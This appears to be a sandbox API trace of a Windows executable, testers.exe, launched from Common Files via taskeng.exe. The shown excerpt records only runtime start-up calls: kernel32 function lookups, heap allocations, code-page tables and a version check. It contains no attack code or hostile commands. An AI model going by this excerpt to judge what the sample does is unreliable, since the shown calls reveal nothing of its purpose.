lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7737fd35, hStdError=0x773e7daf)) [0150.432] GetProcessHeap () returned 0x8a0000 [0150.434] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75990000 [0150.434] GetProcAddress (hModule=0x75990000, lpProcName="FlsAlloc") returned 0x759a4f2b [0150.434] GetProcAddress (hModule=0x75990000, lpProcName="FlsFree") returned 0x759a359f [0150.434] GetProcAddress (hModule=0x75990000, lpProcName="FlsGetValue") returned 0x759a1252 [0150.434] GetProcAddress (hModule=0x75990000, lpProcName="FlsSetValue") returned 0x759a4208 [0150.434] GetProcAddress (hModule=0x75990000, lpProcName="InitializeCriticalSectionEx") returned 0x759a4d28 [0150.435] GetProcAddress (hModule=0x75990000, lpProcName="CreateEventExW") returned 0x75a2410b [0150.435] GetProcAddress (hModule=0x75990000, lpProcName="CreateSemaphoreExW") returned 0x75a24195 [0150.435] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadStackGuarantee") returned 0x759ad31f [0150.435] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolTimer") returned 0x759bee7e [0150.435] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolTimer") returned 0x773a441c [0150.435] GetProcAddress (hModule=0x75990000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x773cc50e [0150.435] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolTimer") returned 0x773cc381 [0150.435] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolWait") returned 0x759bf088 [0150.436] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolWait") returned 0x773b05d7 [0150.436] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolWait") returned 0x773cca24 [0150.436] GetProcAddress (hModule=0x75990000, lpProcName="FlushProcessWriteBuffers") returned 0x77380b8c [0150.436] GetProcAddress (hModule=0x75990000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7743fde8 [0150.436] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentProcessorNumber") returned 0x773d1e1d [0150.436] GetProcAddress (hModule=0x75990000, lpProcName="GetLogicalProcessorInformation") returned 0x75a24761 [0150.436] GetProcAddress (hModule=0x75990000, lpProcName="CreateSymbolicLinkW") returned 0x75a1cd11 [0150.436] GetProcAddress (hModule=0x75990000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0150.437] GetProcAddress (hModule=0x75990000, lpProcName="EnumSystemLocalesEx") returned 0x75a2424f [0150.437] GetProcAddress (hModule=0x75990000, lpProcName="CompareStringEx") returned 0x75a246b1 [0150.437] GetProcAddress (hModule=0x75990000, lpProcName="GetDateFormatEx") returned 0x75a36676 [0150.437] GetProcAddress (hModule=0x75990000, lpProcName="GetLocaleInfoEx") returned 0x75a24751 [0150.437] GetProcAddress (hModule=0x75990000, lpProcName="GetTimeFormatEx") returned 0x75a365f1 [0150.437] GetProcAddress (hModule=0x75990000, lpProcName="GetUserDefaultLocaleName") returned 0x75a247c1 [0150.437] GetProcAddress (hModule=0x75990000, lpProcName="IsValidLocaleName") returned 0x75a247e1 [0150.437] GetProcAddress (hModule=0x75990000, lpProcName="LCMapStringEx") returned 0x75a247f1 [0150.437] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentPackageId") returned 0x0 [0150.438] GetProcAddress (hModule=0x75990000, lpProcName="GetTickCount64") returned 0x759beee0 [0150.438] GetProcAddress (hModule=0x75990000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0150.438] GetProcAddress (hModule=0x75990000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0150.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x3bc) returned 0x8c1e90 [0150.439] GetCurrentThreadId () returned 0x6e0 [0150.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x8b2990 [0150.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x800) returned 0x8c2258 [0150.439] GetStartupInfoW (in: lpStartupInfo=0x89fdb8 | out: lpStartupInfo=0x89fdb8*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2b9d0d, hStdOutput=0xe3e0a766, hStdError=0x0)) [0150.439] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0150.439] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0150.439] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0150.439] GetCommandLineW () returned="C:\\PROGRA~2\\COMMON~1\\testers.exe " [0150.439] GetEnvironmentStringsW () returned 0x8c2a60* [0150.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xaca) returned 0x8c3538 [0150.440] FreeEnvironmentStringsW (penv=0x8c2a60) returned 1 [0150.440] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x354ba8, nSize=0x104 | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4a) returned 0x8b29b0 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x98) returned 0x8c2a60 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x3e) returned 0x8b20a8 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x6c) returned 0x8c2b00 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x6e) returned 0x8c2b78 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x78) returned 0x8af7e8 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x62) returned 0x8c2bf0 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x2e) returned 0x8bc510 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x48) returned 0x8b8128 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x28) returned 0x8bbf68 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1a) returned 0x8bfaa8 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x4a) returned 0x8c2c60 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x72) returned 0x8af868 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x30) returned 0x8bc548 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x2e) returned 0x8bc580 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1c) returned 0x8bfad0 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0xd2) returned 0x8c2cb8 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x7c) returned 0x8c2d98 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x36) returned 0x8c2e20 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x3a) returned 0x8b20f0 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x90) returned 0x8c2e60 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x24) returned 0x8bbf98 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x30) returned 0x8bc5b8 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x36) returned 0x8c2ef8 [0150.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x48) returned 0x8b8178 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x52) returned 0x8c2f38 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x3c) returned 0x8b2138 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x82) returned 0x8c2f98 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x2e) returned 0x8bc5f0 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1e) returned 0x8bfaf8 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x2c) returned 0x8bc628 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x54) returned 0x8c4028 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x52) returned 0x8c4088 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x2a) returned 0x8bc660 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x3c) returned 0x8b2180 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x54) returned 0x8c40e8 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x24) returned 0x8bbfc8 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x30) returned 0x8bc698 [0150.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x8c) returned 0x8c3028 [0150.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c3538 | out: hHeap=0x8a0000) returned 1 [0150.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x80) returned 0x8c30c0 [0150.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x800) returned 0x8c3148 [0150.442] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0150.442] GetLastError () returned 0x0 [0150.442] SetLastError (dwErrCode=0x0) [0150.442] GetLastError () returned 0x0 [0150.442] SetLastError (dwErrCode=0x0) [0150.442] GetLastError () returned 0x0 [0150.442] SetLastError (dwErrCode=0x0) [0150.442] GetACP () returned 0x4e4 [0150.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x220) returned 0x8c3950 [0150.443] GetLastError () returned 0x0 [0150.443] SetLastError (dwErrCode=0x0) [0150.443] IsValidCodePage (CodePage=0x4e4) returned 1 [0150.443] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x89fdac | out: lpCPInfo=0x89fdac) returned 1 [0150.443] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x89f874 | out: lpCPInfo=0x89f874) returned 1 [0150.443] GetLastError () returned 0x0 [0150.443] SetLastError (dwErrCode=0x0) [0150.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x89fc88, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0150.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x89fc88, cbMultiByte=256, lpWideCharStr=0x89f5f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0150.443] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x89f888 | out: lpCharType=0x89f888) returned 1 [0150.443] GetLastError () returned 0x0 [0150.443] SetLastError (dwErrCode=0x0) [0150.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x89fc88, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0150.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x89fc88, cbMultiByte=256, lpWideCharStr=0x89f5c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0150.443] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0150.443] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x89f3b8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0150.443] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x89fb88, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿö¤àãÄý\x89", lpUsedDefaultChar=0x0) returned 256 [0150.443] GetLastError () returned 0x0 [0150.443] SetLastError (dwErrCode=0x0) [0150.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x89fc88, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0150.444] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x89fc88, cbMultiByte=256, lpWideCharStr=0x89f5d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0150.444] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0150.444] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x89f3c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0150.444] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x89fa88, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿö¤àãÄý\x89", lpUsedDefaultChar=0x0) returned 256 [0150.444] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0150.444] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2c4d1c) returned 0x0 [0150.444] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.444] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3c) returned 0x8b21c8 [0150.445] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b3288 [0150.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8b2a08 [0150.445] GetVersionExW (in: lpVersionInformation=0x89fca0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1f1e1d1c, dwMinorVersion=0x23222120, dwBuildNumber=0x27262524, dwPlatformId=0xb1000f, szCSDVersion="\x04") | out: lpVersionInformation=0x89fca0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0150.445] 